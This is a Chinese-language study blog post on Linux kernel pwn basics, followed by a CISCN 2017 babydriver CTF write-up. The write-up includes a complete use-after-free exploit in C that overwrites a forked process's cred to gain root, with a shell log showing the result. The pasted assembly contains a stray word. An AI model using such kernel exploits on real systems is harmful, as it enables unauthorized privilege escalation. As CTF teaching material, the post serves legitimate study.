TCL,推迟了很久的Kernel,现在才开始学习
Basic
Kernel
Kernel是一个程序,是操作系统底层用来管理上层软件发出的各种请求的程序,Kernel将各种请求转换为指令,交给硬件去处理,简而言之,Kernel是连接软件与硬件的中间层
Kernel主要提供两个功能,与硬件交互,提供应用运行环境
在intel的CPU中,会将CPU的权限分为Ring 0,Ring 1,Ring 2,Ring 3,四个等级,权限依次递减,高权限等级可以调用低权限等级的资源
在常见的系统(Windows,Linux,MacOS)中,内核处于Ring 0级别,应用程序处于Ring 3级别
LKM
内核模块是Linux Kernel向外部提供的一个插口,叫做动态可加载内核模块(Loadable Kernel Module,LKM),LKM弥补了Linux Kernel的可拓展性与可维护性,类似搭积木一样,可以往Kernel中接入各种LKM,也可以卸载,常见的外设驱动就是一个LKM
LKM文件与用户态的可执行文件一样,在Linux中就是ELF文件,可以利用IDA进行分析
LKM是单独编译的,但是不能单独运行,他只能作为OS Kernel的一部分
与LKM相关的指令有如下几个
insmod: 讲指定模块加载到内核中
rmmod: 从内核中卸载指定模块
lsmod: 列出已经加载的模块
modprobe: 添加或删除模块,modprobe 在加载模块时会查找依赖关系
syscall
系统调用,指的是用户空间的程序向操作系统内核请求需要更高权限的服务,比如 IO 操作或者进程间通信.系统调用提供用户程序与操作系统间的接口,部分库函数(如 scanf,puts 等 IO 相关的函数实际上是对系统调用的封装(read 和 write)).
ioctl
ioctl 也是一个系统调用,用于与设备通信,可通过man手册查询详细介绍:
1 | NAME |
2 | ioctl - control device |
3 | |
4 | SYNOPSIS |
5 | |
6 | |
7 | int ioctl(int fd, unsigned long request, ...); |
8 | |
9 | DESCRIPTION |
10 | The ioctl() system call manipulates the underlying device parame‐ |
11 | ters of special files. In particular, many operating characteris‐ |
12 | tics of character special files (e.g., terminals) may be con‐ |
13 | trolled with ioctl() requests. The argument fd must be an open |
14 | file descriptor. |
15 | |
16 | The second argument is a device-dependent request code. The third |
17 | argument is an untyped pointer to memory. It's traditionally char |
18 | *argp (from the days before void * was valid C), and will be so |
19 | named for this discussion. |
20 | |
21 | An ioctl() request has encoded in it whether the argument is an in |
22 | parameter or out parameter, and the size of the argument argp in |
23 | bytes. Macros and defines used in specifying an ioctl() request |
24 | are located in the file <sys/ioctl.h>. |
25 | ...... |
第一个参数为打开设备 (open) 返回的 文件描述符,第二个参数为用户程序对设备的控制命令,再后边的参数则是一些补充参数,与设备有关.
状态切换
User Space To Kernel Space
当发生 系统调用,产生异常,外设产生中断等事件时,会发生用户态到内核态的切换,具体的过程为:
1.通过 swapgs 切换 GS 段寄存器,将 GS 寄存器值和一个特定位置的值进行交换,目的是保存 GS 值,同时将该位置的值作为内核执行时的 GS 值使用.
2.将当前栈顶(用户空间栈顶)记录在 CPU 独占变量区域里,将 CPU 独占区域里记录的内核栈顶放入 rsp/esp.
3.通过 push 保存各寄存器值.具体的代码如下:
1 | ENTRY(entry_SYSCALL_64) |
2 | /* SWAPGS_UNSAFE_STACK是一个宏,x86直接定义为swapgs指令 */ |
3 | SWAPGS_UNSAFE_STACK |
4 | |
5 | /* 保存栈值,并设置内核栈 */ |
6 | movq %rsp, PER_CPU_VAR(rsp_scratch) |
7 | movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp |
8 | |
9 | |
10 | /* 通过push保存寄存器值,形成一个pt_regs结构 */ |
11 | /* Construct struct pt_regs on stack */ |
12 | pushq $__USER_DS /* pt_regs->ss */ |
13 | pushq PER_CPU_VAR(rsp_scratch) /* pt_regs->sp */ |
14 | pushq %r11 /* pt_regs->flags */ |
15 | pushq $__USER_CS /* pt_regs->cs */ |
16 | pushq %rcx /* pt_regs->ip */ |
17 | pushq %rax /* pt_regs->orig_ax */ |
18 | pushq %rdi /* pt_regs->di */ |
19 | pushq %rsi /* pt_regs->si */ |
20 | pushq %rdx /* pt_regs->dx */ |
21 | pushq %rcx tuichu /* pt_regs->cx */ |
22 | pushq $-ENOSYS /* pt_regs->ax */ |
23 | pushq %r8 /* pt_regs->r8 */ |
24 | pushq %r9 /* pt_regs->r9 */ |
25 | pushq %r10 /* pt_regs->r10 */ |
26 | pushq %r11 /* pt_regs->r11 */ |
27 | sub $(6*8), %rsp /* pt_regs->bp, bx, r12-15 not saved */ |
Kernel Space To User Space
1.通过 swapgs 恢复 GS 值
2.通过 sysretq 或者 iretq 恢复到用户控件继续执行.如果使用 iretq 还需要给出用户空间的一些信息(CS, eflags/rflags, esp/rsp 等)
Struct Cred 结构
Kernel中利用cred结构记录进程的权限信息,如果能够控制cred结构中的数据,即可提权.
1 | struct cred { |
2 | atomic_t usage; |
3 |
|
4 | atomic_t subscribers; /* number of processes subscribed */ |
5 | void *put_addr; |
6 | unsigned magic; |
7 |
|
8 |
|
9 |
|
10 | kuid_t uid; /* real UID of the task */ |
11 | kgid_t gid; /* real GID of the task */ |
12 | kuid_t suid; /* saved UID of the task */ |
13 | kgid_t sgid; /* saved GID of the task */ |
14 | kuid_t euid; /* effective UID of the task */ |
15 | kgid_t egid; /* effective GID of the task */ |
16 | kuid_t fsuid; /* UID for VFS ops */ |
17 | kgid_t fsgid; /* GID for VFS ops */ |
18 | unsigned securebits; /* SUID-less security management */ |
19 | kernel_cap_t cap_inheritable; /* caps our children can inherit */ |
20 | kernel_cap_t cap_permitted; /* caps we're permitted */ |
21 | kernel_cap_t cap_effective; /* caps we can actually use */ |
22 | kernel_cap_t cap_bset; /* capability bounding set */ |
23 | kernel_cap_t cap_ambient; /* Ambient capability set */ |
24 |
|
25 | unsigned char jit_keyring; /* default keyring to attach requested |
26 | * keys to */ |
27 | struct key __rcu *session_keyring; /* keyring inherited over fork */ |
28 | struct key *process_keyring; /* keyring private to this process */ |
29 | struct key *thread_keyring; /* keyring private to this thread */ |
30 | struct key *request_key_auth; /* assumed request_key authority */ |
31 |
|
32 |
|
33 | void *security; /* subjective LSM security */ |
34 |
|
35 | struct user_struct *user; /* real user ID subscription */ |
36 | struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */ |
37 | struct group_info *group_info; /* supplementary groups for euid/fsgid */ |
38 | struct rcu_head rcu; /* RCU deletion hook */ |
39 | } __randomize_layout; |
此外Kernel另有两个函数可以改变进程的权限
1 | int commit_creds(struct cred *new) |
2 | struct cred* prepare_kernel_cred(struct task_struct* daemon) |
如何获得 commit_creds(),prepare_kernel_cred() 的地址?
/proc/kallsyms 中保存了上述函数的地址,当具有一定权限时可以从其中找到函数地址,如果开启了kaslr后,则函数的地址是变化的,是一种保护机制,与ropper提取的vmlinux的gadget具有相同的基址
tty_Struct and tty_operations
此结构中定义了结构体————tty_operations,而后者包含了大量的函数指针,在bypass-smep中会由于内核开发者添加了smep保护:
管理模式执行保护,保护内核是其不允许执行用户空间代码.在SMEP保护关闭的情况下,存在栈溢出可以将内核栈的返回地址覆盖为用户空间的代码片段执行.在开启了SMEP保护下,当前cpu处于ring 0模式,当返回到用户态执行时会触发页错误.
操作系统是通过CR4寄存器的第20位的值来判断SMEP是否开启,1开启,0关闭,检查SMEP是否开启:
1 | cat /proc/cpuinfo | grep smep |
而在open(“/dev/ptmx”, O_RDWR|O_NOCTTY)则会分配tty_struct,如果合理利用此结构与其中的函数指针,通过”mov CR4,reg”,是可以修改掉CR4寄存器的内容,从而可以绕过smep的检测,成功执行用户空间的代码片段
tty_struct 结构
1 | struct tty_struct { |
2 | int magic; |
3 | struct kref kref; |
4 | struct device *dev; |
5 | struct tty_driver *driver; |
6 | const struct tty_operations *ops; |
7 | int index; |
8 | /* Protects ldisc changes: Lock tty not pty */ |
9 | struct ld_semaphore ldisc_sem; |
10 | struct tty_ldisc *ldisc; |
11 | struct mutex atomic_write_lock; |
12 | struct mutex legacy_mutex; |
13 | struct mutex throttle_mutex; |
14 | struct rw_semaphore termios_rwsem; |
15 | struct mutex winsize_mutex; |
16 | spinlock_t ctrl_lock; |
17 | spinlock_t flow_lock; |
18 | /* Termios values are protected by the termios rwsem */ |
19 | struct ktermios termios, termios_locked; |
20 | struct termiox *termiox; /* May be NULL for unsupported */ |
21 | char name[64]; |
22 | struct pid *pgrp; /* Protected by ctrl lock */ |
23 | struct pid *session; |
24 | unsigned long flags; |
25 | int count; |
26 | struct winsize winsize; /* winsize_mutex */ |
27 | unsigned long stopped:1, /* flow_lock */ |
28 | flow_stopped:1, |
29 | unused:BITS_PER_LONG - 2; |
30 | int hw_stopped; |
31 | unsigned long ctrl_status:8, /* ctrl_lock */ |
32 | packet:1, |
33 | unused_ctrl:BITS_PER_LONG - 9; |
34 | unsigned int receive_room; /* Bytes free for queue */ |
35 | int flow_change; |
36 | struct tty_struct *link; |
37 | struct fasync_struct *fasync; |
38 | wait_queue_head_t write_wait; |
39 | wait_queue_head_t read_wait; |
40 | struct work_struct hangup_work; |
41 | void *disc_data; |
42 | void *driver_data; |
43 | spinlock_t files_lock; /* protects tty_files list */ |
44 | struct list_head tty_files; |
45 |
|
46 | int closing; |
47 | unsigned char *write_buf; |
48 | int write_cnt; |
49 | /* If the tty has a pending do_SAK, queue it here - akpm */ |
50 | struct work_struct SAK_work; |
51 | struct tty_port *port; |
52 | } __randomize_layout; |
tty_operations 结构
1 | struct tty_operations { |
2 | struct tty_struct * (*lookup)(struct tty_driver *driver, |
3 | struct file *filp, int idx); |
4 | int (*install)(struct tty_driver *driver, struct tty_struct *tty); |
5 | void (*remove)(struct tty_driver *driver, struct tty_struct *tty); |
6 | int (*open)(struct tty_struct * tty, struct file * filp); |
7 | void (*close)(struct tty_struct * tty, struct file * filp); |
8 | void (*shutdown)(struct tty_struct *tty); |
9 | void (*cleanup)(struct tty_struct *tty); |
10 | int (*write)(struct tty_struct * tty, |
11 | const unsigned char *buf, int count); |
12 | int (*put_char)(struct tty_struct *tty, unsigned char ch); |
13 | void (*flush_chars)(struct tty_struct *tty); |
14 | int (*write_room)(struct tty_struct *tty); |
15 | int (*chars_in_buffer)(struct tty_struct *tty); |
16 | int (*ioctl)(struct tty_struct *tty, |
17 | unsigned int cmd, unsigned long arg); |
18 | long (*compat_ioctl)(struct tty_struct *tty, |
19 | unsigned int cmd, unsigned long arg); |
20 | void (*set_termios)(struct tty_struct *tty, struct ktermios * old); |
21 | void (*throttle)(struct tty_struct * tty); |
22 | void (*unthrottle)(struct tty_struct * tty); |
23 | void (*stop)(struct tty_struct *tty); |
24 | void (*start)(struct tty_struct *tty); |
25 | void (*hangup)(struct tty_struct *tty); |
26 | int (*break_ctl)(struct tty_struct *tty, int state); |
27 | void (*flush_buffer)(struct tty_struct *tty); |
28 | void (*set_ldisc)(struct tty_struct *tty); |
29 | void (*wait_until_sent)(struct tty_struct *tty, int timeout); |
30 | void (*send_xchar)(struct tty_struct *tty, char ch); |
31 | int (*tiocmget)(struct tty_struct *tty); |
32 | int (*tiocmset)(struct tty_struct *tty, |
33 | unsigned int set, unsigned int clear); |
34 | int (*resize)(struct tty_struct *tty, struct winsize *ws); |
35 | int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew); |
36 | int (*get_icount)(struct tty_struct *tty, |
37 | struct serial_icounter_struct *icount); |
38 | void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m); |
39 |
|
40 | int (*poll_init)(struct tty_driver *driver, int line, char *options); |
41 | int (*poll_get_char)(struct tty_driver *driver, int line); |
42 | void (*poll_put_char)(struct tty_driver *driver, int line, char ch); |
43 |
|
44 | int (*proc_show)(struct seq_file *, void *); |
45 | } __randomize_layout; |
Additional content
除了kaslr与smep两种保护机制,还有其他常见的保护方式:
MMAP_MIN_ADDR:
MMAP_MIN_ADDR保护机制不允许程序分配低内存地址,可以用来防御null pointer dereferences
如果没有这个保护,可以进行如下的攻击行为:
函数指针指针为0,程序可以分配内存到0x000000处.
程序在内存0x000000写入恶意代码.
程序触发kernel BUG().这里说的BUG()其实是linux kernel中用于拦截内核程序超出预期的行为,属于软件主动汇报异常的一种机制.
内核执行恶意代码.
SMAP:
管理模式访问保护,禁止内核访问用户空间的数据.
PTI:
内核页表隔离(Kernel page-table isolation,缩写KPTI,也简称PTI,旧称KAISER)是Linux内核中的一种强化技术,旨在更好地隔离用户空间与内核空间的内存来提高安全性,缓解现代x86 CPU中的“熔毁”硬件安全缺陷.
简单的Kernel介绍如上所述
Referance
Basics - CTF Wiki
Basic Knowledge
UAF
简单分析
之后以通过做题来学习PWN题中Linux_Kernel的利用
以CISCN_2017_babydriver为例,此处只用于初识Kernel Pwn
解压题目所给压缩包,其中有三个文件,分别为boot.sh,bzImage,rootfs.cpio.
首先查看一下boot.sh文件
1 |
|
2 | |
3 | qemu-system-x86_64 \ |
4 | -initrd rootfs.cpio \ |
5 | -kernel bzImage \ |
6 | -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \ |
7 | -enable-kvm \ |
8 | -monitor /dev/null \ |
9 | -m 64M \ |
10 | --nographic \ |
11 | -smp cores=1,threads=1 \ |
12 | -cpu kvm64,+smep |
boot.sh是用于启动内核镜像的脚本,其中调用了qemu从而令内核运行起来
1.-initrd rootfs.cpio,使用 rootfs.cpio 作为内核启动的文件系统
2.-kernel bzImage,使用 bzImage 作为 kernel 映像
3.-m 64M,设置虚拟 RAM 为 64M,默认为 128M
4.-cpu kvm64,+smep,设置 CPU 的安全选项,这里开启了 smep
bzImage是压缩过的内核文件,如有需要,可以利用extract_vmlinux提取出vmlinux,在后续ROP中,可以利用ropper提取gadget,原因就是ROPgadget太慢
rootfs.cpio是内核文件系统的压缩包,其中包含有主要的系统文件,创建一个文件夹解压rootfs.cpio
1 | root@kali:~/babydriver# mkdir tmp |
2 | root@kali:~/babydriver# ls |
3 | boot.sh bzImage rootfs.cpio tmp |
4 | root@kali:~/babydriver# cp rootfs.cpio ./tmp/rootfs.cpio.gz |
5 | root@kali:~/babydriver# cd tmp/ |
6 | root@kali:~/babydriver/tmp# gunzip ./rootfs.cpio.gz |
7 | root@kali:~/babydriver/tmp# cpio -idmv < rootfs.cpio |
8 | ...... |
9 | root@kali:~/babydriver/tmp# ls |
10 | bin etc home init lib linuxrc proc rootfs.cpio sbin sys tmp usr |
发现其中有一个init文件,查看
1 | root@kali:~/babydriver/tmp# cat init |
2 |
|
3 | |
4 | mount -t proc none /proc |
5 | mount -t sysfs none /sys |
6 | mount -t devtmpfs devtmpfs /dev |
7 | chown root:root flag |
8 | chmod 400 flag |
9 | exec 0</dev/console |
10 | exec 1>/dev/console |
11 | exec 2>/dev/console |
12 | |
13 | insmod /lib/modules/4.4.72/babydriver.ko |
14 | chmod 777 /dev/babydev |
15 | echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n" |
16 | setsid cttyhack setuidgid 1000 sh |
17 | |
18 | umount /proc |
19 | umount /sys |
20 | poweroff -d 0 -f |
挂载目录,以及设定权限,其中insmod加载了babydriver.ko这个驱动,那么我们就需要从这个驱动入手,分析漏洞,用IDA加载反编译此文件
简单分析出以下内容:
1.程序含有一个结构体,存放ptr与size
1 | 00000000 babydevice_t struc ; (sizeof=0x10, align=0x8) |
2 | 00000000 |
3 | 00000000 device_buf dq ? |
4 | 00000000 |
5 | 00000008 device_buf_len dq ? |
6 | 00000008 |
7 | 00000010 babydevice_t ends |
2.babyioctl,进行一个判断,然后释放之前的ptr,并利用kmalloc重新申请内存,更新结构体
1 | if ( command == 0x10001 ) |
2 | { |
3 | kfree(babydev_struct.device_buf); |
4 | babydev_struct.device_buf = (char *)_kmalloc(size, 0x24000C0LL); |
5 | babydev_struct.device_buf_len = size; |
6 | } |
3.babyread,从内核空间复制size长度的内容到用户空间
1 | if ( babydev_struct.device_buf ) |
2 | { |
3 | if ( babydev_struct.device_buf_len > size ) |
4 | copy_to_user(buffer, babydev_struct.device_buf, size); |
5 | } |
4.babywrite,从用户空间复制size长度的内容到内核空间
1 | if ( babydev_struct.device_buf ) |
2 | { |
3 | if ( babydev_struct.device_buf_len > size ) |
4 | copy_from_user(babydev_struct.device_buf, buffer, size); |
5 | } |
5.babyopen,申请了一块0x40大小的内存,更新结构体
1 | babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 0x40LL); |
2 | babydev_struct.device_buf_len = 0x40LL; |
6.babyrelease,释放结构体中的内存
1 | _fentry__(inode, filp); |
2 | kfree(babydev_struct.device_buf); |
思路
漏洞点:
1.伪条件竞争,当开启两个设备时,由于结构体是全局的,那么第二次打开设备申请的内存指针会覆盖第一次的
2.释放掉其中一个,形成了释放了空间仍然能够利用那块空间的UAF
3.程序fork()新进程,cred会申请一段空间储存进程的权限信息,如果能够控制之前打开设备申请的空间大小,那么即可令cred申请的空间为之前释放的空间,从而利用UAF改写cred的uid提权为root用户
Exploit
1 |
|
2 |
|
3 |
|
4 |
|
5 |
|
6 |
|
7 |
|
8 | |
9 | int main() |
10 | { |
11 | // 打开两次设备 |
12 | int fd1 = open("/dev/babydev", 2); |
13 | int fd2 = open("/dev/babydev", 2); |
14 | |
15 | // 修改 babydev_struct.device_buf_len 为 sizeof(struct cred) |
16 | ioctl(fd1, 0x10001, 0xA8); |
17 | |
18 | // 释放 fd1 |
19 | close(fd1); |
20 | |
21 | // 新起进程的 cred 空间会和刚刚释放的 babydev_struct 重叠 |
22 | int pid = fork(); |
23 | if(pid < 0) |
24 | { |
25 | puts("[*] fork error!"); |
26 | exit(0); |
27 | } |
28 | |
29 | else if(pid == 0) |
30 | { |
31 | // 通过更改 fd2,修改新进程的 cred 的 uid,gid 等值为0 |
32 | char zeros[30] = {0}; |
33 | write(fd2, zeros, 28); |
34 | |
35 | if(getuid() == 0) |
36 | { |
37 | puts("[+] root now."); |
38 | system("/bin/sh"); |
39 | exit(0); |
40 | } |
41 | } |
42 | |
43 | else |
44 | { |
45 | wait(NULL); |
46 | } |
47 | close(fd2); |
48 | |
49 | return 0; |
50 | } |
静态编译并打包:
1 | root@kali:~/babydriver# gcc exp.c --static -o exp |
2 | ...... |
3 | root@kali:~/babydriver# mv exp ./tmp/ |
4 | root@kali:~/babydriver# cd ./tmp |
5 | root@kali:~/babydriver/tmp# find . |cpio -o --format=newc > rootfs.cpio |
6 | ...... |
7 | root@kali:~/babydriver/tmp# mv rootfs.cpio .. |
8 | root@kali:~/babydriver/tmp# cd .. |
9 | root@kali:~/babydriver# ./boot.sh |
10 | ...... |
11 | / $ ls |
12 | bin etc lib root sys |
13 | cred home linuxrc rootfs.cpio tmp |
14 | dev init proc sbin usr |
15 | / $ id |
16 | uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) |
17 | / $ ./cred |
18 | [ 48.699265] device open |
19 | [ 48.700565] device open |
20 | [ 48.701899] alloc done |
21 | [ 48.703283] device release |
22 | [+] root now. |
23 | / # id |
24 | uid=0(root) gid=0(root) groups=1000(ctf) |
25 | / # |
Use gdb and qemu to debug the vmlinux
1.在boot.sh中添加”-s ",然后运行脚本
2.”gdb vmlinux -q”调试vmlinux文件,可用extract_vmlinux从bzImage中提取出:
加载驱动的符号表
"cat /sys/modules/device_name/section/.text"获取驱动符号表基址
......
pwndbg> add-symbol-file the_address_of_device_file text_address
下断点
pwndbg> b func_name
连接已经启动的内核虚拟机
pwndbg> target remote localhost:1234
若显示Remote 'g' packet reply is too long,需要设置架构
pwndbg> set architecture i386:x86-64:intel
若需回到虚拟机中操作
pwndbg> c
Continuing.
3.如此回到内核虚拟机运行exploit程序,在gdb中会自动断点,可以方便调试exploit.